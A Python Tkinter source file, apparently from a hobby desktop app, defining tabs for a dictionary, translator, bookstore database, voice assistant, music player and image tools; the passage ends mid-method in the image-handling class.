class Dictionary:
def __init__(self,tabControl):
# add tab
self.tab2 = ttk.Frame(tabControl)
tabControl.add(self.tab2, text="Dictionary")
# creating new frame
self.row2 = Frame(self.tab2)
self.data = json.load(open("data.json"))
self.lbl1 = Label(self.tab2, text='Enter a word to search')
# entry for accepting a word to search
self.display = StringVar()
self.dictentry = Entry(self.tab2, textvariable=self.display)
# text Widget to display meanings of words
self.meaning = Text(self.row2, bg="lightyellow")
self.meaning.bind("<Double-Button-1>", self.copy_text_to_clipboard)
#search button
self.search = Button(self.tab2, text="SEARCH", command=self.Search)
# label
self.lbl2 = Label(self.tab2, text="* - Double click on meaning text box to copy text to clipboard")
# set properties of widgets
def set(self):
self.lbl1.config(font=('times', 20, 'bold'), pady="10")
self.dictentry.config(font=('times', 15), bd=10)
self.meaning.tag_configure("center", justify='center')
self.meaning.tag_add("center", 1.0, "end")
self.search.config(width=20,bg="lightgreen", pady="10")
self.lbl2.config(font=('courier', 8, 'bold'), bg="lightblue")
# a dialog msg asking for confirmation
def dialogmsg(self,w):
if askyesno('Verify', w):
return "Y"
else:
return "N"
# copy text to clipboard on double click on text widget of dictionary
def copy_text_to_clipboard(self,event):
field_value = event.widget.get("1.0", 'end-1c') # get field value from event, but remove line return at end
root.clipboard_clear() # clear clipboard contents
root.clipboard_append(field_value) # append new value to clipbaord
# clear dictionary entry
def clear_search(self):
self.dictentry.delete(0, END)
# get meaning of word
def translate(self,w):
# convert to lower case
w = w.lower()
# clear entry widget
self.clear_search()
# check for differnt cases
if w in self.data:
return self.data[w]
elif w.title() in self.data:
return self.data[w.title()]
elif w.upper() in self.data: # in case user enters words like USA or NATO
return self.data[w.upper()]
elif len(get_close_matches(w, self.data.keys())) > 0:
ans = self.dialogmsg("Did you mean %s instead?" % get_close_matches(w, self.data.keys())[0])
if ans == "Y":
return self.data[get_close_matches(w, self.data.keys())[0]]
elif ans == "N":
return "The word doesn't exist. Please double check it."
else:
return "We didn't understand your entry."
else:
return "The word doesn't exist. Please double check it."
# checking for errors or wrong info and add meaning to text widget
def Search(self):
if (self.display.get() != "" or self.display.get() != None):
ss = self.display.get()
i = 1
output = self.translate(ss)
if not ("The word doesn't exist" in output or "We didn't understand your entry." in output):
self.meaning.insert(END, "MEANING -\n")
if type(output) == list:
for item in output:
# add meaning to text widget
self.meaning.insert(END, str(i) + ". " + item + "\n\n")
i += 1
else:
self.meaning.insert(END, output + "\n\n")
# pack widgets on screen
def packwidgets(self):
self.lbl1.pack()
self.dictentry.pack()
self.row2.pack(fill=X,padx="10")
self.meaning.pack(pady=10)
self.search.pack()
self.lbl2.pack(pady=10)
class TranslateText:
def __init__(self,tabControl):
# add tab
self.tab3 = ttk.Frame(tabControl)
tabControl.add(self.tab3, text="Translate")
# label for prompting user to enter a sentence or a word to translate
self.lbl3 = Label(self.tab3, text='Enter Something in English to Translate')
# entry to accept user input
self.mysentence = StringVar()
self.sentence = Entry(self.tab3, textvariable=self.mysentence)
# select language to translate into from the listbox
self.lbl4 = Label(self.tab3, text='Select a language -')
self.Lb = Listbox(self.tab3)
self.languages = ['german', 'hindi', 'spanish', 'italian', 'chinese', 'japanese', 'french']
# Label to display the translated text
self.ttxt = StringVar()
self.translatedtext = Label(self.tab3, bg="lightgreen", textvariable=self.ttxt, wraplength=500)
# creating new Frame to add buttons in it
self.row3 = Frame(self.tab3)
# button to enable translation
self.GO = Button(self.row3, text="GO", command=self.go)
# button to clear all input and results from previous search
self.CLEAR = Button(self.row3, text="CLEAR", command=self.clear_text)
# set properties and perform basic operations on widgets
def set(self):
self.lbl3.config(font=('times', 20, 'bold'), pady="20")
self.sentence.config(font=('times', 20), bd=10, width=40)
self.lbl4.config(font=('times', 20, 'bold'), pady="20")
k = 1
for ll in self.languages:
self.Lb.insert(k, ll)
k += 1
self.translatedtext.config(font=('times', 20, 'bold'), width=30)
self.GO.config(width=10, height=2, bg="lightgreen")
self.row3.columnconfigure(0, weight=1)
self.row3.columnconfigure(1, weight=1)
self.CLEAR.config(width=10, height=2, bg="lightblue")
# clear data in widgets of translate tab
def clear_text(self):
self.sentence.delete(0, END)
self.Lb.select_clear(ACTIVE)
self.ttxt.set("")
# method to translate a word or a sentence into selected language
def go(self):
# check if input is not empty
if self.mysentence.get() != None and self.mysentence.get() != "":
lang = str(self.Lb.get(ACTIVE))
if lang != "" or lang != None:
# translator module to translate the text
translator = Translator(to_lang=lang)
translation = translator.translate(self.mysentence.get())
# set translated text to label
self.ttxt.set(lang + " - " + translation + "\n")
# pack label to screen
self.translatedtext.pack(pady=10)
else:
# no language selected from the list
self.ttxt.set("please select a valid language from the list\n")
else:
# invalid input
showwarning("invalid input", "Enter a valid sentence")
# pack widgets to screen
def packwidgets(self):
self.lbl3.pack()
self.sentence.pack()
self.lbl4.pack()
self.Lb.pack()
self.row3.pack(fill=X)
self.GO.grid(row=0, column=0, padx=10, pady=20, sticky=E)
self.CLEAR.grid(row=0, column=1, pady=20, sticky=W)
#Bookstore class
class BookStore:
def __init__(self,tabControl):
# add tab
self.tab4 = ttk.Frame(tabControl)
tabControl.add(self.tab4, text="BookStore")
# creating new frame to add widgets
self.row4 = Frame(self.tab4)
# label for book info
self.l1 = Label(self.row4, text="Title")
self.l2 = Label(self.row4, text="Author")
self.l3 = Label(self.row4, text="Year")
self.l4 = Label(self.row4, text="ISBN")
# entries for accepting bookinfo as input
self.title_text = StringVar()
self.e1 = Entry(self.row4, textvariable=self.title_text)
self.author_text = StringVar()
self.e2 = Entry(self.row4, textvariable=self.author_text)
self.year_text = StringVar()
self.e3 = Entry(self.row4, textvariable=self.year_text)
self.isbn_text = StringVar()
self.e4 = Entry(self.row4, textvariable=self.isbn_text)
#listbox to show entries in the database
self.list1 = Listbox(self.row4, height=10, width=40)
# adding scrollbar to listbox
self.sb1 = Scrollbar(self.row4)
# buttons for differnt operations
self.b1 = Button(self.row4, text="View all", width=12,bg="lightgreen", command=self.view_command)
self.b2 = Button(self.row4, text="Search entry", width=12,bg="lightblue", command=self.search_command)
self.b3 = Button(self.row4, text="Add entry", width=12,bg="lightgreen", command=self.add_command)
self.b4 = Button(self.row4, text="Update selected", width=12,bg="lightblue", command=self.update_command)
self.b5 = Button(self.row4, text="Delete selected", width=12,bg="lightgreen", command=self.delete_command)
# creating another frame for add online book search functionality
self.row5 = Frame(self.tab4)
self.searchbooklbl = Label(self.row5, text="Search a book online :", font=('times', 15, 'bold'))
self.bookentrytext = StringVar()
self.searchbookentry = Entry(self.row5, textvariable=self.bookentrytext, bd=5, font=('times', 15))
# frame for adding search results label
self.row6 = Frame(self.tab4)
self.volumeinfo = Label(self.row6, font=('times', 15), justify="left", bg="lightblue")
self.searchbookentry.bind("<Return>", self.bookinfo)
# get bookinfo from google api
def bookinfo(self,event):
# get bookname entered by user
ss = self.bookentrytext.get()
try:
if ss != "":
ss = ss.replace(" ", "")
# calling searchbook method from bbcnews.py
book = searchbooks(ss)
# get required info from dictionary object book
book_title = book["volumeInfo"]["title"]
book_authors = book["volumeInfo"]["authors"]
# if pagcount is present in bookinfo
if "pageCount" in book["volumeInfo"].keys():
pagecount = str(book["volumeInfo"]["pageCount"])
else:
pagecount = "unknown"
book_lang = book["volumeInfo"]["language"]
published_date = book["volumeInfo"]["publishedDate"]
isbn = book["volumeInfo"]["industryIdentifiers"][1]["identifier"]
summary = textwrap.fill(book["searchInfo"]["textSnippet"], width=65)
# display bookinfo in label
self.volumeinfo.config(text="\nTitle: " + book_title + "\nAuthor(s): " + ",".join(
book_authors) + "\nPublished-Date: " + published_date + "\nISBN: " + isbn
+ "\nPage count: " + pagecount + "\nLanguage: " + book_lang + "\nSummary:\n" + summary)
self.volumeinfo.grid(row=1, sticky=W)
#clear book entry
self.bookentrytext.set("")
else:
# book not found
showerror("message", "please enter a valid book")
except:
# book not found
showerror("message", "book not found ,maybe try providing author name or isbn")
# get the selected item from the listbox
def get_selected_row(self,event):
try:
global selected_tuple
index = self.list1.curselection()[0]
selected_tuple = self.list1.get(index)
# automatically put the details in the entries of frame row4
self.e1.delete(0, END)
# set title
self.e1.insert(END, selected_tuple[1])
self.e2.delete(0, END)
# set author
self.e2.insert(END, selected_tuple[2])
self.e3.delete(0, END)
# set year
self.e3.insert(END, selected_tuple[3])
self.e4.delete(0, END)
# set isbn
self.e4.insert(END, selected_tuple[4])
except IndexError:
pass
# view contents of bookstore database
def view_command(self):
self.list1.delete(0, END)
for row in backend.view():
self.list1.insert(END, row)
# search for a book in database
def search_command(self):
self.list1.delete(0, END)
for row in backend.search(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get()):
self.list1.insert(END, row)
# add a book into database
def add_command(self):
if self.title_text.get()!="" and self.author_text.get()!="" and self.year_text.get()!="" and self.isbn_text.get()!="":
backend.insert(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get())
self.list1.delete(0, END)
self.list1.insert(END, (self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get()))
else:
showerror("Error","please provide all the required info of book")
# delete entry from database
def delete_command(self):
try:
backend.delete(selected_tuple[0])
except:
showerror("Error","no item to delete or select an item first")
# update details of a book
def update_command(self):
try:
backend.update(selected_tuple[0], self.title_text.get(), self.author_text.get(), self.year_text.get(), self.isbn_text.get())
except:
showerror("Error","Nothing to update")
# pack widgets on screen
def packwidgets(self):
self.row4.pack(side="top")
self.l1.grid(row=0, column=0, padx="20", pady="10")
self.l2.grid(row=0, column=2, padx="20", pady="10")
self.l3.grid(row=1, column=0, padx="20", pady="10")
self.l4.grid(row=1, column=2, padx="20", pady="10")
self.e1.grid(row=0, column=1, padx="20", pady="10")
self.e2.grid(row=0, column=3, padx="20", pady="10")
self.e3.grid(row=1, column=1, padx="20", pady="10")
self.e4.grid(row=1, column=3, padx="20", pady="10")
self.list1.grid(row=2, column=0, rowspan=10, columnspan=2, padx="20")
self.sb1.grid(row=2, column=2, rowspan=10)
self.list1.configure(yscrollcommand=self.sb1.set)
self.sb1.configure(command=self.list1.yview)
self.list1.bind('<<ListboxSelect>>', self.get_selected_row)
self.b1.grid(row=2, column=3, pady="5")
self.b2.grid(row=3, column=3, pady="5")
self.b3.grid(row=4, column=3, pady="5")
self.b4.grid(row=5, column=3, pady="5")
self.b5.grid(row=6, column=3, pady="5")
self.row5.pack(pady="20")
self.searchbooklbl.grid(row=0, column=0, sticky=N, padx="10")
self.searchbookentry.grid(row=0, column=1, sticky=N)
self.row6.pack()
# voice assistant class
class VoiceAssistant:
def __init__(self,tabControl):
# add tab
self.tab5 = ttk.Frame(tabControl)
tabControl.add(self.tab5, text="Voice Assistant")
# creating a new Frame to add widgets
self.row7 = Frame(self.tab5)
self.label1 = ttk.Label(self.row7, text='Query:')
# get search query from user as input
self.entry1 = ttk.Entry(self.row7, width=40)
self.radiobtn = StringVar()
self.entry1.bind('<Return>', self.get)
self.photo = PhotoImage(file='images/microphone.png').subsample(30,30)
#Mic button
self.MyButton6 = Button(self.row7, image=self.photo, command=self.listenvoice, bd=0, activebackground='#c1bfbf',
overrelief='groove', relief='sunken')
# search button
self.MyButton1 = ttk.Button(self.row7, text='Search', width=10, command=self.callback)
# add radio buttons in new frame
self.row8 = Frame(self.tab5)
# radio buttons
self.MyButton2 = ttk.Radiobutton(self.row8, text='Google', value='google', variable=self.radiobtn)
self.MyButton3 = ttk.Radiobutton(self.row8, text='Duck', value='duck', variable=self.radiobtn)
self.MyButton4 = ttk.Radiobutton(self.row8, text='Amazon-Books', value='amz', variable=self.radiobtn)
self.MyButton5 = ttk.Radiobutton(self.row8, text='Youtube', value='ytb', variable=self.radiobtn)
# frame to display info returned
self.row9 = Frame(self.tab5)
self.mylabel = Label(self.row9, text="* say jarvis before asking a question through voice", bg="lightblue",
font=('courier', 10, 'bold'), wraplength=500)
self.jarvistext = Text(self.row9, font=('courier', 15, 'bold'), bg="lightyellow")
# set focus on entry widget
self.entry1.focus()
# set google radiobutton selected by default
self.radiobtn.set('google')
# method to greet me on tab click
def wishMe(self):
hour = int(datetime.now().hour)
if hour >= 0 and hour < 12:
speak("Good Morning sir!")
elif hour >= 12 and hour < 18:
speak("Good Afternoon sir!")
else:
speak("Good Evening sir!")
# callback method for search query provided in assistant tab and search for the query on selected search engine
def callback(self):
if self.radiobtn.get() == 'google' and self.entry1.get() != '':
webbrowser.open('http://google.com/search?q=' + self.entry1.get())
elif self.radiobtn.get() == 'duck' and self.entry1.get() != '':
webbrowser.open('http://duckduckgo.com/?q=' + self.entry1.get())
elif self.radiobtn.get() == 'amz' and self.entry1.get() != '':
webbrowser.open('https://amazon.com/s/?url=search-alias%3Dstripbooks&field-keywords=' + self.entry1.get())
elif self.radiobtn.get() == 'ytb' and self.entry1.get() != '':
webbrowser.open('https://www.youtube.com/results?search_query=' + self.entry1.get())
else:
pass
# bind method for search entry which works the same as callback ,triggered when user presses <enter> key
def get(self,event):
if self.radiobtn.get() == 'google' and self.entry1.get() != '':
webbrowser.open('http://google.com/search?q=' + self.entry1.get())
elif self.radiobtn.get() == 'duck' and self.entry1.get() != '':
webbrowser.open('http://duckduckgo.com/?q=' + self.entry1.get())
elif self.radiobtn.get() == 'amz' and self.entry1.get() != '':
webbrowser.open('https://amazon.com/s/?url=search-alias%3Dstripbooks&field-keywords=' + self.entry1.get())
elif self.radiobtn.get() == 'ytb' and self.entry1.get() != '':
webbrowser.open('https://www.youtube.com/results?search_query=' + self.entry1.get())
else:
speak("please select a search engine sir")
# method for speech_recognition and provide appropriate results
def listenvoice(self):
self.MyButton6.config(state=DISABLED)
try:
mixer.music.load('chime1.mp3')
mixer.music.play()
t=threading.Thread(target=self.performinthread)
t.daemon=True
t.start()
except:
self.MyButton6.config(state=NORMAL)
def performinthread(self):
query = myCommand()
if query != "" and query != None:
query = query.lower()
self.entry1.focus()
self.entry1.delete(0, END)
self.entry1.insert(0, query)
# open content on web browser based on speech recognition
if 'open youtube' in query:
speak('okay sir')
webbrowser.open('www.youtube.com')
elif 'bye' in query or 'go to sleep' in query or 'shut up' in query:
speak('Goodbye sir , have a nice day')
elif 'open google' in query:
speak('okay')
webbrowser.open('www.google.co.in')
elif 'open gmail' in query:
speak('okay')
webbrowser.open('www.gmail.com')
elif "what\'s up" in query or 'how are you' in query:
stMsgs = ['Just doing my thing!', 'I am fine!', 'Nice!', 'I am nice and full of energy']
speak(random.choice(stMsgs))
elif "jarvis" in query:
query = query[7:]
try:
try:
res = client.query(query)
results = next(res.results).text
self.jarvistext.insert(END, results + "\n")
speak('Got it.')
speak(results)
except:
# search on wikipedia
results = wikipedia.summary(query, sentences=2)
self.jarvistext.insert(END, results + "\n")
speak('Got it.')
speak('WIKIPEDIA says - ')
speak(results)
except:
speak('may be you should google it sir')
webbrowser.open('www.google.com')
# get the selected radiobutton
elif self.radiobtn.get() == 'google':
webbrowser.open('http://google.com/search?q=' + query)
elif self.radiobtn.get() == 'duck':
webbrowser.open('http://duckduckgo.com/?q=' + query)
elif self.radiobtn.get() == 'amz':
webbrowser.open('https://amazon.com/s/?url=search-alias%3Dstripbooks&field-keywords=' + query)
elif self.radiobtn.get() == 'ytb':
webbrowser.open('https://www.youtube.com/results?search_query=' + query)
else:
speak("pardon me sir!")
self.MyButton6.config(state=NORMAL)
# pack widgets on screen
def packwidgets(self):
self.label1.grid(row=0, column=0, sticky='W', padx="10")
self.entry1.grid(row=0, column=1, padx="10", columnspan=4)
self.MyButton6.grid(row=0, column=5)
self.MyButton1.grid(row=0, column=6, padx="10")
self.row7.pack(fill="x", pady="20")
self.row8.pack(fill="x")
self.MyButton2.grid(row=0, column=0, sticky=N, padx="10")
self.MyButton3.grid(row=0, column=1, sticky=N, padx="10")
self.MyButton4.grid(row=0, column=2, padx="10")
self.MyButton5.grid(row=0, column=3, sticky=N, padx="10")
self.row9.pack(pady="10")
self.mylabel.pack()
self.jarvistext.pack(expand="no", padx="10")
class MusicPlayer:
def __init__(self,tabControl):
# add tab
self.tab6 = ttk.Frame(tabControl)
tabControl.add(self.tab6, text="Music")
self.statusbar = ttk.Label(self.tab6, text="Welcome to R.A.STUDIOS", relief=SUNKEN, anchor=W, font='Times 10 italic')
self.playlist = []
# playlist frame
self.leftframe = Frame(self.tab6)
self.playlistlbl = Label(self.leftframe, text="PlayList", font=('courier', 10, 'bold'), fg="red")
self.playlistbox = Listbox(self.leftframe)
# variable to store absolute location of file
self.filename_path = None
# playlist - contains the full path + filename
# playlistbox - contains just the filename
# Fullpath + filename is required to play the music inside play_music load function
self.addBtn = ttk.Button(self.leftframe, text="+ Add", command=self.browse_file)
self.delBtn = ttk.Button(self.leftframe, text="- Del", command=self.del_song)
# rightframe containing music buttons
self.rightframe = Frame(self.tab6)
# 3 frames in rightframe
self.topframe = Frame(self.rightframe)
self.lengthlabel = ttk.Label(self.topframe, text='Total Length : --:--')
self.currenttimelabel = ttk.Label(self.topframe, text='Current Time : --:--', relief=GROOVE)
# variable to check if music is paused or muted
self.paused = FALSE
self.muted = FALSE
self.middleframe = Frame(self.rightframe)
# play button and photo on it
self.playPhoto = PhotoImage(file='images/play.png')
self.playBtn = ttk.Button(self.middleframe, image=self.playPhoto, command=self.play_music)
# stop button and its photo
self.stopPhoto = PhotoImage(file='images/stop.png')
self.stopBtn = ttk.Button(self.middleframe, image=self.stopPhoto, command=self.stop_music)
# pause button and its photo
self.pausePhoto = PhotoImage(file='images/pause.png')
self.pauseBtn = ttk.Button(self.middleframe, image=self.pausePhoto, command=self.pause_music)
# Bottom Frame for volume, rewind, mute etc.
self.bottomframe = Frame(self.rightframe)
# rewind button and its photo
self.rewindPhoto = PhotoImage(file='images/rewind.png')
self.rewindBtn = ttk.Button(self.bottomframe, image=self.rewindPhoto, command=self.rewind_music)
# mute button and its photo
self.mutePhoto = PhotoImage(file='images/mute.png')
self.volumePhoto = PhotoImage(file='images/volume.png')
self.volumeBtn = ttk.Button(self.bottomframe, image=self.volumePhoto, command=self.mute_music)
# scale to set volume of song
self.scale = ttk.Scale(self.bottomframe, from_=0, to=100, orient=HORIZONTAL, command=self.set_vol)
# set properties of widgets
def set(self):
# read user's saved playlist
with open('myplaylist.txt', 'r') as pl:
for filename in pl.readlines():
self.filename_path = filename[:-1]
self.add_to_playlist(filename[:-1])
pl.close()
self.scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
# pack widgets to screen
def packwidgets(self):
self.statusbar.pack(side=BOTTOM, fill=X)
self.leftframe.pack(side=LEFT, padx=20)
self.playlistlbl.pack(side=TOP)
self.playlistbox.pack()
self.addBtn.pack(side=LEFT)
self.delBtn.pack(side=LEFT)
self.rightframe.pack(side=RIGHT, padx=10, pady=20)
self.topframe.pack()
self.lengthlabel.pack(pady=5)
self.currenttimelabel.pack()
self.middleframe.pack(pady=30, padx=20)
self.playBtn.grid(row=0, column=0, padx=5)
self.stopBtn.grid(row=0, column=1, padx=5)
self.pauseBtn.grid(row=0, column=2, padx=5)
self.bottomframe.pack()
self.rewindBtn.grid(row=0, column=0)
self.volumeBtn.grid(row=0, column=1)
self.scale.grid(row=0, column=2, pady=15, padx=30)
# browse file to add to playlist
def browse_file(self):
self.filename_path = askopenfilename()
self.add_to_playlist(self.filename_path)
# add file to playlist
with open('myplaylist.txt', 'a') as pl:
pl.write(self.filename_path + '\n')
pl.close()
mixer.music.queue(self.filename_path)
# add song to playlist llistbox
def add_to_playlist(self,filename):
filename = os.path.basename(filename)
index = 0
self.playlistbox.insert(index, filename)
self.playlist.insert(index, self.filename_path)
index += 1
# delete selected song from playlist
def del_song(self):
selected_song = self.playlistbox.curselection()
if len(selected_song) != 0:
selected_song = int(selected_song[0])
self.playlistbox.delete(selected_song)
self.playlist.pop(selected_song)
else:
showerror("error", "no song selected")
# show info about song
def show_details(self,play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
# div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
self.lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=self.start_count, args=(total_length,))
t1.start()
# start counting length of song
def start_count(self,t):
# mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
# Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
if self.paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
self.currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
sleep(1)
current_time += 1
# play music
def play_music(self):
if self.paused:
mixer.music.unpause()
self.statusbar['text'] = "Music Resumed"
self.paused = FALSE
else:
try:
self.stop_music()
sleep(1)
selected_song = self.playlistbox.curselection()
selected_song = int(selected_song[0])
play_it =self. playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
self.statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
self.show_details(play_it)
except Exception as e:
print(e)
showerror('File not found', 'could not find the file. Please check again.')
# stop music
def stop_music(self):
mixer.music.stop()
self.statusbar['text'] = "Music Stopped"
# pause music
def pause_music(self):
self.paused = TRUE
mixer.music.pause()
self.statusbar['text'] = "Music Paused"
# rewind music
def rewind_music(self):
self.play_music()
self.statusbar['text'] = "Music Rewinded"
# set volume of music
def set_vol(self,val):
volume = float(val) / 100
mixer.music.set_volume(volume)
# set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
# mute music
def mute_music(self):
if self.muted: # Unmute the music
mixer.music.set_volume(0.7)
self.volumeBtn.configure(image=self.volumePhoto)
self.scale.set(70)
self.muted = FALSE
else: # mute the music
mixer.music.set_volume(0)
self.volumeBtn.configure(image=self.mutePhoto)
self.scale.set(0)
self.muted = TRUE
# class to perform operations of images
class ImageAnalyze:
def __init__(self,tabControl):
# add tab
self.tab7 = ttk.Frame(tabControl)
tabControl.add(self.tab7, text="Images")
# panelA for loading image and PanelB for showing result image
self.panelA = None
self.panelB = None
# cv2 image
self.image = None
# absolute path of image
self.path = None
# saveimage type
self.saveimg = None
# image name and location
self.imgname = None
# response object to download images from web
self.response = google_images_download.googleimagesdownload()
# frame containing buttons to perform operations on images
self.row10 = Frame(self.tab7)
self.btn = Button(self.row10, text="Select an image", command=lambda m="Select an image": self.image_perform(m))
self.btn1 = Button(self.row10, text="Blur image", command=lambda m="Blur image": self.image_perform(m))
self.btn2 = Button(self.row10, text="Detect Edges", command=lambda m="Detect Edges": self.image_perform(m))
self.btn3 = Button(self.row10, text="Save image to desktop", command=lambda m="Save image to desktop": self.image_perform(m))
self.btn4 = Button(self.row10, text="Transposed image", command=lambda m="Transposed image": self.image_perform(m))
self.btn5 = Button(self.row10, text="Resize image", command=lambda m="Resize image": self.image_perform(m))
self.btn6 = Button(self.row10, text="Create Thumbnail", command=lambda m="Create Thumbnail": self.image_perform(m))
self.btn7=Button(self.row10, text="Extract Text", command=lambda m="Extract Text": self.image_perform(m))
# set width and height of image for resizing and creating thumbnail
self.row11 = Frame(self.tab7)
self.lblw = Label(self.row11, text='width')
self.lblh = Label(self.row11, text='height')
self.widthvar = StringVar()
self.widthent = Entry(self.row11, textvariable=self.widthvar, width=8)
self.heighthvar = StringVar()
self.heightent = Entry(self.row11, textvariable=self.heighthvar, width=8)
# frame containing image download entry to accept search query to download related images
self.row12 = Frame(self.tab7)
self.lbldownload = Label(self.row12, text='Search for images to download')
self.downloadimg = StringVar()
self.imgentry = Entry(self.row12, textvariable=self.downloadimg)
# bind method to download image on pressing <Enter>
self.imgentry.bind("<Return>",self.downloadimages)
# image to text
self.imgtotxtvar=StringVar()
self.imgtotxtent=Entry(self.row12,textvariable=self.imgtotxtvar)
self.largeimg=None
self.flag=0
self.newwin=None
# show full size image on label click
def showlargeimg(self,event):
if self.largeimg!=None and self.flag==0:
self.newwin = Toplevel(root)
self.newwin.geometry(str(self.wd)+"x"+str(self.ht)+"+100+5")
self.flag=1
self.newwin.protocol("WM_DELETE_WINDOW", self.winclose)
canv = Canvas(self.newwin, relief=SUNKEN)
sbarV = Scrollbar(self.newwin, orient=VERTICAL)
sbarH = Scrollbar(self.newwin, orient=HORIZONTAL)
sbarV.config(command=canv.yview)
sbarH.config(command=canv.xview)
canv.config(width=400, height=200)
# canv.config(scrollregion=(0,0,1000, 1000))
# canv.configure(scrollregion=canv.bbox('all'))
canv.config(highlightthickness=0)
canv.config(yscrollcommand=sbarV.set)
canv.config(xscrollcommand=sbarH.set)
sbarV.pack(side=RIGHT, fill=Y)
sbarH.pack(side=BOTTOM, fill=X)
canv.pack(side=LEFT, expand=YES, fill=BOTH)
width, height = self.wd,self.ht
canv.config(scrollregion=(0, 0, width, height))
self.imgtag = canv.create_image(0, 0, anchor="nw", image=self.largeimg)
def winclose(self):
self.flag = 0
self.newwin.destroy()
# set properties of widgets
def set(self):
self.lblw.config(font=('times', 15, 'bold'))
self.lblh.config(font=('times', 15, 'bold'))
self.widthent.config(bd=5)
self.row11.columnconfigure(0, weight=1)
self.row11.columnconfigure(1, weight=1)
self.heightent.config(bd=5)
self.lbldownload.config(font=('times', 11, 'bold'))
self.imgentry.config(font=('times', 12), bd=10, width=30)
self.imgtotxtvar.set("Text from image if any")
self.imgtotxtent.config(font=('times', 11), width=50)
# pack widgets on screen
def packwidgets(self):
self.row11.pack()
self.lblw.grid(row=0, column=0, sticky="w", padx="10")
self.lblh.grid(row=0, column=1, sticky="e", padx="10")
self.widthent.grid(row=1, column=0, sticky="w", padx="10", pady="5")
self.heightent.grid(row=1, column=1, sticky="e", padx="10", pady="5")
self.row10.pack(side="bottom", fill="x")
self.btn3.grid(row=1, column=0, pady="10", padx="30")
self.btn4.grid(row=1, column=1, pady="10", padx="30")
self.btn2.grid(row=1, column=2, pady="10", padx="30")
self.btn1.grid(row=2, column=0, pady="10", padx="30")
self.btn.grid(row=2, column=1, pady="10", padx="30")
self.btn5.grid(row=2, column=2, pady="10", padx="30")
self.btn6.grid(row=3, column=0, pady="10", padx="30")
self.btn7.grid(row=3, column=1, pady="10", padx="30")
self.row12.pack(side="bottom", fill="x")
self.lbldownload.grid(row=0, column=0, padx="10")
self.imgentry.grid(row=0, column=1, padx="5")
self.imgtotxtent.grid(row=1,columnspan=3,padx="10")
# method for downloading images from web
def downloadimages(self,event):
if self.downloadimg.get() == "":
showerror("error", "please provide a search query in input")
else:
arguments = {"keywords": self.downloadimg.get(),
"format": "jpg",
"limit": 4,
"print_urls": True,
"size": "medium",
"aspect_ratio": "panoramic",
"output_directory": r"C:\Users\hp\Desktop\mynewimages",
"safe_search": True,
"help": True
}
try:
self.response.download(arguments)
self.downloadimg.set("")
# Handling File NotFound Error
except FileNotFoundError:
arguments = {"keywords": self.downloadimg.get(),
"format": "jpg",
"limit": 1,
"print_urls": True,
"size": "medium"}
# Providing arguments for the searched query
try:
# Downloading the photos based
# on the given arguments
self.response.download(arguments)
except:
pass
# set image properties
def set_img_prop(self,imagename, svimg, method):
self.resultimg(svimg, method)
self.imgname = imagename
self.saveimg = svimg
# get result image converted into tkimage and displayed in panelB
def resultimg(self,img, method="Y"):
avgi = img
if method == "Y":
avgi = Image.fromarray(img)
avgi = ImageTk.PhotoImage(avgi)
if self.panelB is None:
self.panelB = Label(self.tab7, image=avgi,width=200,height=250)
self.panelB.image = avgi
self.panelB.pack(side="right", padx=10)
else:
# update the pannels
self.panelB.configure(image=avgi)
self.panelB.image = avgi
# method for performing various image manipulation operations
def image_perform(self,method):
if method == "Select an image":
self.path = askopenfilename()
if self.panelB != None:
self.panelB.config(image="")
if self.panelA != None:
self.panelA.config(image="")
if self.newwin!=None:
self.flag=0
self.newwin.destroy()
try:
if len(self.path) > 0:
# load the image from disk
self.image = cv2.imread(self.path)
# OpenCV represents images in BGR order; however PIL represents
# images in RGB order, so we need to swap the channels
self.image = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
# convert the images to PIL format...
self.image = Image.fromarray(self.image)
self.largeimg=self.image
self.wd,self.ht=self.image.size
self.largeimg = ImageTk.PhotoImage(self.largeimg)
# ...and then to ImageTk format
self.image = ImageTk.PhotoImage(self.image)
if self.panelA is None:
# the first panel will store our original image
self.panelA = Label(self.tab7, image=self.image,width=200,height=250)
self.panelA.image = self.image
self.panelA.bind('<Button-1>', self.showlargeimg)
self.panelA.pack(side="left", padx=10)
else:
# update the pannels
self.panelA.configure(image=self.image)
self.panelA.image = self.image
except:
showwarning("invalid image format", "please select a valid image")
else:
if self.panelA != None and len(self.path) > 0:
self.image = cv2.imread(self.path)
# convert from bgr to rgb
avging = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
if method == "Blur image":
avging = cv2.blur(avging, (10, 10))
self.set_img_prop("blur_img", avging, "Y")
self.saveimg = Image.fromarray(avging)
elif method == "Detect Edges":
gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)
# convert to gray scale image
edged = cv2.Canny(gray, 50, 100)
self.set_img_prop("detect_edges_img", edged, "Y")
self.saveimg = Image.fromarray(edged)
elif method == "Transposed image":
# convert cv2 to PIL image object
transposed_img = Image.fromarray(avging)
transposed_img = transposed_img.transpose(Image.FLIP_LEFT_RIGHT)
self.set_img_prop("transposed_img", transposed_img, "N")
elif method == "Save image to desktop":
if self.saveimg != None:
print("yes")
self.saveimg.save("C:\\Users\hp\Desktop\\" + self.imgname + ".jpg")
showinfo("message", "image saved succesfully")
else:
showerror("error", "no changes made to original image")
elif method == "Resize image":
if self.heighthvar.get() == "" or self.widthvar.get() == "":
showinfo("message", "Please specify height and width in pixels")
else:
